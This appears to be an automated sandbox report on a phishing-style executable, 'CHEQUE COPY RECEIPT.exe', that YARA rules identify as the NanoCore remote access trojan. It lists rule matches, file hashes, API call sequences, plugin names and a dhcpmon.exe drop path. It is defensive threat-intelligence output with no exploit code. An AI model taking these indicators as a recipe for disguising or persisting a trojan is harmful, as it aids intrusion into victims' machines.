Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.5640000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403486
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		10_2_00403486

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00407272	0_2_00407272
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00406A9B	0_2_00406A9B
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_73CA1A98	0_2_73CA1A98
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_0040A2A5	1_2_0040A2A5
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_022CE471	1_2_022CE471
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_022CE480	1_2_022CE480
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_022CBBD4	1_2_022CBBD4
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_0505F5F8	1_2_0505F5F8
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_05059788	1_2_05059788
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_0505A610	1_2_0505A610
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 9_2_73351A98	9_2_73351A98
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00407272	10_2_00407272
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00406A9B	10_2_00406A9B
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_0040A2A5	12_2_0040A2A5
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_04D6E480	12_2_04D6E480
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_04D6E471	12_2_04D6E471
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_04D6E47B	12_2_04D6E47B
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_04D6BBD4	12_2_04D6BBD4
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_0506F5F8	12_2_0506F5F8
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_05069788	12_2_05069788
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_0506A610	12_2_0506A610

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: String function: 00401ED0 appears 46 times
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: String function: 0040569E appears 36 times

Source: CHEQUE COPY RECEIPT.exe, 00000000.00000003.234516407.0000000002D2F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000000.00000002.240855923.0000000002390000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.509100019.0000000006510000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508122820.00000000050E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508333536.0000000005660000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000009.00000003.254700874.0000000002D1F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 00000009.00000002.270382228.00000000028E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs CHEQUE COPY RECEIPT.exe
Source: CHEQUE COPY RECEIPT.exe, 0000000C.00000002.285299150.0000000005200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs CHEQUE COPY RECEIPT.exe

Source: CHEQUE COPY RECEIPT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.282706630.00000000022F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
